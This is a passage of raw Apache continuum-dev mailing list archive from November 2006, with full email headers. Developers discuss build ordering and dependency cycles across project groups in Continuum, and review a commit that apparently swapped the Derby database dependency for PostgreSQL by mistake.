-0000 Delivered-To: [email protected] Received: (qmail 16538 invoked by uid 500); 8 Nov 2006 14:58:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16527 invoked by uid 99); 8 Nov 2006 14:58:03 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 06:58:03 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 06:57:49 -0800 Received: by ug-out-1314.google.com with SMTP id j40so1366500ugd for <[email protected]>; Wed, 08 Nov 2006 06:57:28 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=PVNfK/Xav+juoAItqvK45ofLtsXop+xvKQ4sn/I0weksmP12JsOs6ndPwA7tHzkV1hXZiU6Yz4NhRCxPoQ9QoBCkFMZ1HXG48cVZ1Hn3Wv6kIbLHncEvJt4DQwVVaz0Q6rxbbk7pVeuppWjv9vF7ZZP3AYRU+JuYyuRh5ovHcwc= Received: by 161.129.204.104 with SMTP id m3mr1727093buc.1162997847810; Wed, 08 Nov 2006 06:57:27 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 8 Nov 2006 06:57:27 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 8 Nov 2006 08:57:27 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: build scheduling issues In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: base64 Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org dGhlIGlzc3VlIGlzbid0IGN5Y2xlcyB3aXRoaW4gYSBub3JtYWwgbTIgYnVpbGQsIGJ1dCB3aGVu IHlvdSBzaG92ZSA0Cm9yIDUgb2YgdGhlbSB0b2dldGhlciBpbnRvIG9uZSBjb250aW51dW0gaW5z dGFuY2UgYW5kIHRoZW4gYXNrIHRoZW0KYWxsIHRvIHBsYXkgdG9nZXRoZXIuCgpGb3IgZXhhbXBs ZSBpZiB5b3Ugc2hvdmVkIGNvbnRpbnV1bSwgbWF2ZW4tc2hhcmVkIGFuZCBhcmNoaXZhIGFsbCBp bnRvCnRoZSBzYW1lIGNvbnRpbnV1bSBpbnN0YW5jZSBhbmQgdHJpZ2dlcmVkIGEgYnVpbGQgd2l0 aCBhbGwgb2YgdGhlbSBpbgp0aGUgc2FtZSBkaXJlY3RlZCBncmFwaCB0aGVuIHdlIGhhdmUgaGFk IGluc3RhbmNlcyBvZiBjeWNsZXMgaW4gdGhlCnBhc3QgKG5vdCBzdXJlIGFib3V0IHJpZ2h0IG5v dywgbXBpciBjeWNsZSBtaWdodCBiZSByZWZhY3RvcmVkIG91dAp0aGFua3MgdG8gam9ha2ltKS4K CmVtbSBoYWQgYW5vdGhlciBleGFtcGxlIGxhc3QgbmlnaHQgd2hlbiB3ZSB3ZXJlIHRhbGtpbmcg YWJvdXQgaXQgYXMgd2VsbC4KCmplc3NlCgpPbiAxMS84LzA2LCBCcmV0dCBQb3J0ZXIgPGJyZXR0 QGFwYWNoZS5vcmc+IHdyb3RlOgo+IFNvcnJ5LCBhbSBJIG1pc3Npbmcgc29tZXRoaW5nPyBIb3cg ZG8gd2UgZW5kIHVwIHdpdGggYSBjeWNsZSBpbgo+IENvbnRpbnV1bT8gSXMgdGhlcmUgYSBzcGVj aWZpYyBleGFtcGxlPwo+Cj4gSSBrbm93IGl0J3MgcG9zc2libGUgLSB3ZSBoYWQgdG8gYWxsb3cg aXQgaW4gdGhlIHJlcG9zaXRvcnkgKGVnLAo+IGRvbTRqIDwtPiBqYXhlbiksIGJ1dCBpdCBpcyBj ZXJ0YWlubHkgdW5kZXNpcmFibGUgYW5kIGhvbmVzdGx5IHNob3VsZAo+IGJlIHJhcmUsIGVzcGVj aWFsbHkgaW4gbTIgYnVpbHQgYXJ0aWZhY3RzLiBTaG91bGQgaXQgcHJvZHVjZSBhIGJ1aWxkCj4g d2FybmluZz8KPgo+IEJhc2ljYWxseSwgdGhlIHRyZWF0bWVudCB0aGVyZSBpcyB0byBqdXN0IHN0 b3AgZm9sbG93aW5nIHRoZSB0cmVlCj4gd2hlbiB5b3UgaGl0IHRoZSBjeWNsZSwgcmF0aGVyIHRo YW4gY2hhbmdpbmcgdGhlIHdheSB0aGluZ3MgYXJlCj4gb3JkZXJlZC4gU28gaXQncyByZWFsbHkg YXJiaXRyYXJ5IHdoaWNoIG1pZ2h0IGNvbWUgZmlyc3QsIGJ1dCBpc24ndAo+IHJlYWxseSBhIGNv bmNlcm4gdGhlcmUuCj4KPiBBbnl3YXksIGp1c3Qgd29uZGVyaW5nLgo+Cj4gQ2hlZXJzLAo+IEJy ZXR0Cj4KPiBPbiAwOC8xMS8yMDA2LCBhdCAxMTo0NiBQTSwgRW1tYW51ZWwgVmVuaXNzZSB3cm90 ZToKPgo+ID4gWWVzCj4gPgo+ID4gSmVzc2UgTWNDb25uZWxsIGEgw6ljcml0IDoKPiA+PiB3ZSBz aG91bGQgYWRkIGEgcGFnZSB0aGF0IGFuYWx5emVzIGVhY2ggc2NoZWR1bGUgZm9yIGN5Y2xlcy4u LnRoYXQKPiA+PiB3b3VsZCBiZSBhIGNvb2wgbGl0dGxlIGZlYXR1cmUKPiA+PiBPbiAxMS84LzA2 LCBFbW1hbnVlbCBWZW5pc3NlIDxlbW1hbnVlbEB2ZW5pc3NlLm5ldD4gd3JvdGU6Cj4gPj4+IFll cywgd2UgbmVlZCBhIGdsb2JhbCBvcmRlcmluZywgc28gcHJvamVjdHMgd2lsbCBiZSBidWlsZAo+ ID4+PiBpbmRlcGVuZGVudGx5IG9mIGdyb3VwcywgYmVjYXVzZSBpbiBzb21lCj4gPj4+IGNhc2Ug YSBjeWNsZSBjYW4gYmUgY3JlYXRlZCBiZXR3ZWVuIGdyb3VwcyAobm90IG5lY2Vzc2FyeSBiZXR3 ZWVuCj4gPj4+IHByb2plY3RzKS4KPiA+Pj4KPiA+Pj4gSW4gY2FzZSBhIGN5Y2xlIGlzIGRldGVj dGVkIGJldHdlZW4gcHJvamVjdHMsIGNvbnRpbnV1bSBjYW4ndAo+ID4+PiBmaW5kIHRoZSBidWls ZCBvcmRlci4gSW4gdGhpcyBjYXNlLCBJCj4gPj4+IHRoaW5rIHdlIG5lZWQgdG8gc29ydCBhIGxp dHRsZSBwcm9qZWN0IHNvIHdpbGwgcmVkdWNlIGJ1aWxkCj4gPj4+IGVycm9ycy4gU28gaWYgd2Ug aGF2ZSBhIGN5Y2xlLCB3ZSBjYW4KPiA+Pj4gc29ydCBwcm9qZWN0cyBpbiBhIGdyb3VwIGFuZCBi dWlsZCB0aGVtLiBJbiBtb3N0IG9mIGNhc2UgKG1hdmVuCj4gPj4+IHByb2plY3RzKSwgd2UgZG9u J3QgaGF2ZSBhIGN5Y2xlIGluCj4gPj4+IGEgZ3JvdXAuCj4gPj4+Cj4gPj4+IEVtbWFudWVsCj4g Pj4+Cj4gPj4+IEJyZXR0IFBvcnRlciBhIMOpY3JpdCA6Cj4gPj4+ID4gSSB0aGluayB5b3Ugd2Fu dCBnbG9iYWwgb3JkZXJpbmcuIEdyb3VwaW5nIHNob3VsZCBqdXN0IGJlIGEKPiA+Pj4gPiBkaXNw bGF5L21hbmFnZW1lbnQgdGVjaG5pcXVlLCBub3QgYW55dGhpbmcgdGhhdCBjaGFuZ2VzIGhvdwo+ ID4+PiBwcm9qZWN0cyBhcmUKPiA+Pj4gPiBoYW5kbGVkLgo+ID4+PiA+Cj4gPj4+ID4gSG93ZXZl ciwgdGhpcyBuZWVkcyB0byBiZSByZXZpZXdlZCBhcyBhIHdob2xlICh3aGljaCBJIHRoaW5rCj4g Pj4+IEVtbWFudWVsIGlzCj4gPj4+ID4gZG9pbmcpLCBzdWNoIHRoYXQgYnVpbGRzIGNhbiBiZSB0 cmlnZ2VyZWQgd2hlbiB0aGVpcgo+ID4+PiBkZXBlbmRlbmNpZXMgY2hhbmdlCj4gPj4+ID4gd2hp Y2ggd2lsbCBoZWxwIHdpdGggdGhlIG9yZGVyaW5nIGFzIGl0IHdvbid0IGJlIGRlcGVuZGFudCBv bgo+ID4+PiB0aGVtIGFsbAo+ID4+PiA+IGJlaW5nIHRyaWdnZXJlZCBhdCB0aGUgc2FtZSB0aW1l Pwo+ID4+PiA+Cj4gPj4+ID4gLSBCcmV0dAo+ID4+PiA+Cj4gPj4+ID4gT24gMDgvMTEvMjAwNiwg YXQgOTo1MSBBTSwgSmVzc2UgTWNDb25uZWxsIHdyb3RlOgo+ID4+PiA+Cj4gPj4+ID4+IEkgd2Fz IHJlYWRpbmcgdGhyb3VnaCB0aGUgRGVmYXVsdENvbnRpbnV1bS5idWlsZFByb2plY3RzCj4gPj4+ ICggU2NoZWR1bGUgaWQKPiA+Pj4gPj4gKSBtZXRob2QgYW5kIGFmdGVyIGRpc2N1c3Npbmcgc29t ZSB0aGluZ3Mgd2l0aCBFbW1hbnVlbC4uLkkKPiA+Pj4gdGhpbmsgd2UKPiA+Pj4gPj4gaGF2ZSBh IHByb2JsZW0gaGVyZS4gIFdoZW4gSSB3ZW50IHRocm91Z2ggYW5kIHJlZmFjdG9yZWQKPiA+Pj4g dGhpbmdzIHRvCj4gPj4+ID4+IHN1cHBvcnQgYSBtb3JlIFByb2plY3QgR3JvdXAgY2VudHJpYyBz ZXR1cCB3aXRoIGNvbnRpbnV1bSBJCj4gPj4+IGNoYW5nZWQKPiA+Pj4gPj4gdGhpcyBtZXRob2Qg YSBiaXQuCj4gPj4+ID4+Cj4gPj4+ID4+IE9yaWdpbmFsbHksIHRoaXMgbWV0aG9kIHdvdWxkIGdh dGhlciB1cCBhbGwgcHJvamVjdHMgdGhhdAo+ID4+PiB3b3VsZCBiZQo+ID4+PiA+PiB0cmlnZ2Vy ZWQgYnkgdGhhdCBzY2hlZHVsZSwgcnVuIHRoZW0gYWxsIHRocm91Z2ggdGhlIHByb2plY3QKPiA+ Pj4gc29ydGVyCj4gPj4+ID4+IGFuZCB0aGVuIGJ1aWxkIGVhY2ggaW4gc2VxdWVuY2UuCj4gPj4+ ID4+Cj4gPj4+ID4+IFdoZW4gSSBhZGRlZCB0aGUgcHJvamVjdCBncm91cHMgdG8gdGhpcyBtaXgs IEkgY2hhbmdlZCB0aGluZ3MKPiA+Pj4gdG8gYmUgb24KPiA+Pj4gPj4gYSBwcm9qZWN0IGdyb3Vw IGJhc2lzLCBzbyB0aGF0IG9uIGEgcHJvamVjdCBncm91cCBieSBwcm9qZWN0Cj4gPj4+IGdyb3Vw Cj4gPj4+ID4+IGJhc2lzIGl0IHdvdWxkIG9yZGVyIHRoZSBwcm9qZWN0cyBhbmQgYnVpbGQgdGhl bS4gIEF0IHRoZSB0aW1lIEkKPiA+Pj4gPj4gdGhvdWdodCB0aGlzIHdhcyB0aGUgd2F5IHRvIGdv Li4uYnV0IG1heWJlIG5vdC4KPiA+Pj4gPj4KPiA+Pj4gPj4gMTc6MTQgPGV2ZW5pc3NlPiB3ZSBu ZWVkIHRvIHRha2UgYWxsIHByb2plY3RzIGZyb20gYWxsIGdyb3VwcywKPiA+Pj4gc29ydCB0aGVt Cj4gPj4+ID4+IDE3OjE1IDxldmVuaXNzZT4gaWYgd2UgZG9uJ3QgaGF2ZSBhIGN5Y2xlLCBpdCdz IG9rIGFuZCB3ZQo+ID4+PiBidWlsZCBhbGwKPiA+Pj4gPj4gMTc6MTUgPGV2ZW5pc3NlPiBpZiBp dCBpc24ndCBvaywgd2Ugc29ydCBwcm9qZWN0IGJ5IGdyb3VwCj4gPj4+ID4+Cj4gPj4+ID4+IEZv ciBleGFtcGxlLCBpZiB3ZSBsb2FkZWQgdXAgYSBQbGV4dXMgZ3JvdXAgYW5kIGEgTWF2ZW4KPiA+ Pj4gZ3JvdXAuLi50aGUKPiA+Pj4gPj4gd2F5IGl0IGN1cnJlbnRseSBpcyAod2l0aCBteSBjaGFu Z2UpIGl0IHdvdWxkIHByb2Nlc3MgYWxsCj4gPj4+IHRyaWdnZXJlZAo+ID4+PiA+PiBidWlsZHMg d2l0aGluIG9uZSBncm91cCBhbmQgdGhlbiBwcm9jZXNzIGFsbCB0cmlnZ2VyZWQgYnVpbGRzCj4g Pj4+IGluIHRoZQo+ID4+PiA+PiBvdGhlciBncm91cC4gICBUaGlzIHdvdWxkIG5vdCB0YWtlIGlu dG8gYWNjb3VudCBwb3RlbnRpYWwKPiA+Pj4gZGVwZW5kZW5jaWVzCj4gPj4+ID4+IGJldHdlZW4g dGhlIHR3by4KPiA+Pj4gPj4KPiA+Pj4gPj4gRG9lcyBhbnlvbmUgaGF2ZSBhbnkgdGhvdWdodHMg b24gdGhpcz8gIEkgYW0gaW5jbGluZWQgdG8gZml4Cj4gPj4+IGl0IHVwIHNvCj4gPj4+ID4+IGl0 cyBsaWtlIGl0IHVzZWQgdG8gYmUgd2hlcmUgYWxsIHByb2plY3RzIGFjcm9zcyBhbGwgcHJvamVj dAo+ID4+PiBncm91cHMKPiA+Pj4gPj4gYXJlIHRocm93biBpbnRvIHRoZSBncmFwaC4uLi5JIGtl ZXAgZmVlbGluZyBsaWtlIEkgYW0gbWlzc2luZwo+ID4+PiA+PiBzb21ldGhpbmcgd3Jvbmcgd2l0 aCB0aGlzLCBidXQgSSBjYW4ndCBwaW4gaXQgZG93bi4KPiA+Pj4gPj4KPiA+Pj4gPj4gT25lIHRo aW5nIHRoYXQgcGVyaGFwcyBFbW1hbnVlbCBjb3VsZCBleHBsYWluIGEgYml0IG1vcmUgaXMKPiA+ Pj4gdGhlIHRoaXJkCj4gPj4+ID4+IGNvbW1lbnQgdGhlcmUuICBJbiBvdXIgY29udmVyc2F0aW9u IG9uIHRoaXMgaGUgc2FpZCB0aGF0IGhlCj4gPj4+IHRoaW5rcwo+ID4+PiA+PiB0aGF0IHRoZSBj eWNsZXMgYXJlIGNyb3BwaW5nIHVwIGFsbCB0aGUgdGltZSwgYW5kIGlmIHRoYXRzIHRoZQo+ID4+ PiBjYXNlCj4gPj4+ID4+IHRoZW4gd2UgYXJlIGJ1aWxkaW5nIGEgbG90IG9mIHVub3JkZXJlZCBi dWlsZHMgd2hpY2ggd291bGQKPiA+Pj4gYWNjb3VudCBmb3IKPiA+Pj4gPj4gc29tZSBvZiB0aGUg c3RyYW5nZSByZXBvcnRzIHdlIGhhdmUgYmVlbiBnZXR0aW5nLiAgQXJlIHlvdQo+ID4+PiBzYXlp bmcgdGhhdAo+ID4+PiA+PiBpZiB3ZSBkZXRlY3QgdGhlIGN5Y2xlIHdlIGRlZmF1bHQgYmFjayB0 byB0aGUgd2F5IEkgYW0gZG9pbmcKPiA+Pj4gaXQgbm93Pwo+ID4+PiA+PiBvcmRlciB3aXRoaW4g dGhlIGdyb3Vwcy4uLgo+ID4+PiA+Pgo+ID4+PiA+PiBqZXNzZQo+ID4+PiA+Pgo+ID4+PiA+Pgo+ ID4+PiA+Pgo+ID4+PiA+Pgo+ID4+PiA+Pgo+ID4+PiA+PiAtLWplc3NlIG1jY29ubmVsbAo+ID4+ PiA+PiBqZXNzZS5tY2Nvbm5lbGxAZ21haWwuY29tCj4gPj4+ID4KPiA+Pj4gPgo+ID4+PiA+Cj4g Pj4+Cj4gPj4+Cj4KCgotLSAKamVzc2UgbWNjb25uZWxsCmplc3NlLm1jY29ubmVsbEBnbWFpbC5j b20K From [email protected] Wed Nov 08 17:35:56 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73281 invoked from network); 8 Nov 2006 17:35:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 17:35:55 -0000 Received: (qmail 44129 invoked by uid 500); 8 Nov 2006 17:36:06 -0000 Delivered-To: [email protected] Received: (qmail 44106 invoked by uid 500); 8 Nov 2006 17:36:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44091 invoked by uid 99); 8 Nov 2006 17:36:05 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 09:36:05 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 09:35:50 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id BBF02AD43C8; Wed, 8 Nov 2006 12:53:15 -0500 (EST) Message-ID: <[email protected]> Date: Wed, 08 Nov 2006 12:35:22 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20061025) MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: Re: svn commit: r472550 - in /maven/continuum/trunk/continuum-webapp: pom.xml src/main/resources/META-INF/plexus/application.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------090304080307030000000402" X-Virus-Checked: Checked by ClamAV on apache.org --------------090304080307030000000402 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Can you do the same with javax.activation? :) [email protected] wrote: > Author: jmcconnell > Date: Wed Nov 8 09:17:12 2006 > New Revision: 472550 > > URL: http://svn.apache.org/viewvc?view=rev&rev=472550 > Log: > align with latest plexus-security configuration mechanism > > update the pom.xml with a dependency on commons-lang v 2.1 til we get it coming in correctly transitively > > Modified: > maven/continuum/trunk/continuum-webapp/pom.xml > maven/continuum/trunk/continuum-webapp/src/main/resources/META-INF/plexus/application.xml > > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------090304080307030000000402-- From [email protected] Thu Nov 09 04:15:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5079 invoked from network); 9 Nov 2006 04:15:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 04:15:31 -0000 Received: (qmail 23673 invoked by uid 500); 9 Nov 2006 04:15:42 -0000 Delivered-To: [email protected] Received: (qmail 23649 invoked by uid 500); 9 Nov 2006 04:15:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23632 invoked by uid 99); 9 Nov 2006 04:15:41 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 20:15:41 -0800 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=DATE_IN_PAST_06_12 X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony3.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 20:15:27 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony3.iinet.net.au with ESMTP; 09 Nov 2006 12:14:57 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAANM5UkXLniZSdGdsb2JhbAANjDwB X-IronPort-AV: i="4.09,402,1157299200"; d="scan'208"; a="1023111335:sNHT4436977288" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Brett Porter <[email protected]> Subject: Re: build scheduling issues Date: Thu, 9 Nov 2006 08:35:33 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org That's a cycle between the groups, not the projects, so shouldn't be =20 a problem once changed. - Brett On 09/11/2006, at 1:57 AM, Jesse McConnell wrote: > the issue isn't cycles within a normal m2 build, but when you shove 4 > or 5 of them together into one continuum instance and then ask them > all to play together. > > For example if you shoved continuum, maven-shared and archiva all into > the same continuum instance and triggered a build with all of them in > the same directed graph then we have had instances of cycles in the > past (not sure about right now, mpir cycle might be refactored out > thanks to joakim). > > emm had another example last night when we were talking about it as =20= > well. > > jesse > > On 11/8/06, Brett Porter <[email protected]> wrote: >> Sorry, am I missing something? How do we end up with a cycle in >> Continuum? Is there a specific example? >> >> I know it's possible - we had to allow it in the repository (eg, >> dom4j <-> jaxen), but it is certainly undesirable and honestly should >> be rare, especially in m2 built artifacts. Should it produce a build >> warning? >> >> Basically, the treatment there is to just stop following the tree >> when you hit the cycle, rather than changing the way things are >> ordered. So it's really arbitrary which might come first, but isn't >> really a concern there. >> >> Anyway, just wondering. >> >> Cheers, >> Brett >> >> On 08/11/2006, at 11:46 PM, Emmanuel Venisse wrote: >> >> > Yes >> > >> > Jesse McConnell a =E9crit : >> >> we should add a page that analyzes each schedule for cycles...that >> >> would be a cool little feature >> >> On 11/8/06, Emmanuel Venisse <[email protected]> wrote: >> >>> Yes, we need a global ordering, so projects will be build >> >>> independently of groups, because in some >> >>> case a cycle can be created between groups (not necessary between >> >>> projects). >> >>> >> >>> In case a cycle is detected between projects, continuum can't >> >>> find the build order. In this case, I >> >>> think we need to sort a little project so will reduce build >> >>> errors. So if we have a cycle, we can >> >>> sort projects in a group and build them. In most of case (maven >> >>> projects), we don't have a cycle in >> >>> a group. >> >>> >> >>> Emmanuel >> >>> >> >>> Brett Porter a =E9crit : >> >>> > I think you want global ordering. Grouping should just be a >> >>> > display/management technique, not anything that changes how >> >>> projects are >> >>> > handled. >> >>> > >> >>> > However, this needs to be reviewed as a whole (which I think >> >>> Emmanuel is >> >>> > doing), such that builds can be triggered when their >> >>> dependencies change >> >>> > which will help with the ordering as it won't be dependant on >> >>> them all >> >>> > being triggered at the same time? >> >>> > >> >>> > - Brett >> >>> > >> >>> > On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: >> >>> > >> >>> >> I was reading through the DefaultContinuum.buildProjects >> >>> ( Schedule id >> >>> >> ) method and after discussing some things with Emmanuel...I >> >>> think we >> >>> >> have a problem here. When I went through and refactored >> >>> things to >> >>> >> support a more Project Group centric setup with continuum I >> >>> changed >> >>> >> this method a bit. >> >>> >> >> >>> >> Originally, this method would gather up all projects that >> >>> would be >> >>> >> triggered by that schedule, run them all through the project >> >>> sorter >> >>> >> and then build each in sequence. >> >>> >> >> >>> >> When I added the project groups to this mix, I changed things >> >>> to be on >> >>> >> a project group basis, so that on a project group by project >> >>> group >> >>> >> basis it would order the projects and build them. At the =20 >> time I >> >>> >> thought this was the way to go...but maybe not. >> >>> >> >> >>> >> 17:14 <evenisse> we need to take all projects from all groups, >> >>> sort them >> >>> >> 17:15 <evenisse> if we don't have a cycle, it's ok and we >> >>> build all >> >>> >> 17:15 <evenisse> if it isn't ok, we sort project by group >> >>> >> >> >>> >> For example, if we loaded up a Plexus group and a Maven >> >>> group...the >> >>> >> way it currently is (with my change) it would process all >> >>> triggered >> >>> >> builds within one group and then process all triggered builds >> >>> in the >> >>> >> other group. This would not take into account potential >> >>> dependencies >> >>> >> between the two. >> >>> >> >> >>> >> Does anyone have any thoughts on this? I am inclined to fix >> >>> it up so >> >>> >> its like it used to be where all projects across all project >> >>> groups >> >>> >> are thrown into the graph....I keep feeling like I am missing >> >>> >> something wrong with this, but I can't pin it down. >> >>> >> >> >>> >> One thing that perhaps Emmanuel could explain a bit more is >> >>> the third >> >>> >> comment there. In our conversation on this he said that he >> >>> thinks >> >>> >> that the cycles are cropping up all the time, and if thats the >> >>> case >> >>> >> then we are building a lot of unordered builds which would >> >>> account for >> >>> >> some of the strange reports we have been getting. Are you >> >>> saying that >> >>> >> if we detect the cycle we default back to the way I am doing >> >>> it now? >> >>> >> order within the groups... >> >>> >> >> >>> >> jesse >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> --jesse mcconnell >> >>> >> [email protected] >> >>> > >> >>> > >> >>> > >> >>> >> >>> >> > > > --=20 > jesse mcconnell > [email protected] From [email protected] Thu Nov 09 04:15:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5287 invoked from network); 9 Nov 2006 04:15:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 04:15:39 -0000 Received: (qmail 24318 invoked by uid 500); 9 Nov 2006 04:15:50 -0000 Delivered-To: [email protected] Received: (qmail 24289 invoked by uid 500); 9 Nov 2006 04:15:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24272 invoked by uid 99); 9 Nov 2006 04:15:49 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 20:15:49 -0800 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=DATE_IN_PAST_06_12 X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony3.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 20:15:35 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony3.iinet.net.au with ESMTP; 09 Nov 2006 12:15:13 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAANM5UkXLniZSdGdsb2JhbAANjDwB X-IronPort-AV: i="4.09,402,1157299200"; d="scan'208"; a="1023111527:sNHT46720892" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r472550 - in /maven/continuum/trunk/continuum-webapp: pom.xml src/main/resources/META-INF/plexus/application.xml Date: Thu, 9 Nov 2006 08:38:10 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org On 09/11/2006, at 4:17 AM, [email protected] wrote: > + <!-- > <dependency> > <groupId>org.apache.derby</groupId> > <artifactId>derby</artifactId> > </dependency> > + --> > + <dependency> > + <groupId>postgresql</groupId> > + <artifactId>postgresql</artifactId> > + <version>8.0-312.jdbc3</version> > + </dependency> oops? - Brett From [email protected] Thu Nov 09 11:45:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23090 invoked from network); 9 Nov 2006 11:44:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 11:44:56 -0000 Received: (qmail 45401 invoked by uid 500); 9 Nov 2006 11:45:07 -0000 Delivered-To: [email protected] Received: (qmail 45375 invoked by uid 500); 9 Nov 2006 11:45:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 17658 invoked by uid 99); 9 Nov 2006 08:38:03 -0000 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_POST,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Message-ID: <000c01c703da$49ad0c60$4001a8c0@nonec03d6244ff> From: "Rahul Thakur" <[email protected]> To: <[email protected]> Subject: webapp start up error Date: Thu, 9 Nov 2006 21:37:22 +1300 MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="Windows-1252"; reply-type=original Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2869 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962 